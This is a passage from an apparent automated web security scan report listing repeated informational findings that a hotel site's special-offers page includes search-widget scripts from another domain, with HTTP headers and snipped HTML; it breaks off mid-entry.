http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106164261250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:30:15 GMT
Content-Length: 151018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106164261250" type="text/javascript"></script>
...[SNIP]...

5.202. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107145980000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:31:53 GMT
Content-Length: 151204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107145980000" type="text/javascript"></script>
...[SNIP]...

5.203. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232715390823750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 19:25:39 GMT
Content-Length: 151055

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232715390823750" type="text/javascript"></script>
...[SNIP]...

5.204. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110182386250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:36:58 GMT
Content-Length: 151036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110182386250" type="text/javascript"></script>
...[SNIP]...

5.205. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110019730000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:36:41 GMT
Content-Length: 151098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110019730000" type="text/javascript"></script>
...[SNIP]...

5.206. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110103636250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:36:50 GMT
Content-Length: 151044

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110103636250" type="text/javascript"></script>
...[SNIP]...

5.207. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111752073750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:34 GMT
Content-Length: 151044

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111752073750" type="text/javascript"></script>
...[SNIP]...

5.208. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.c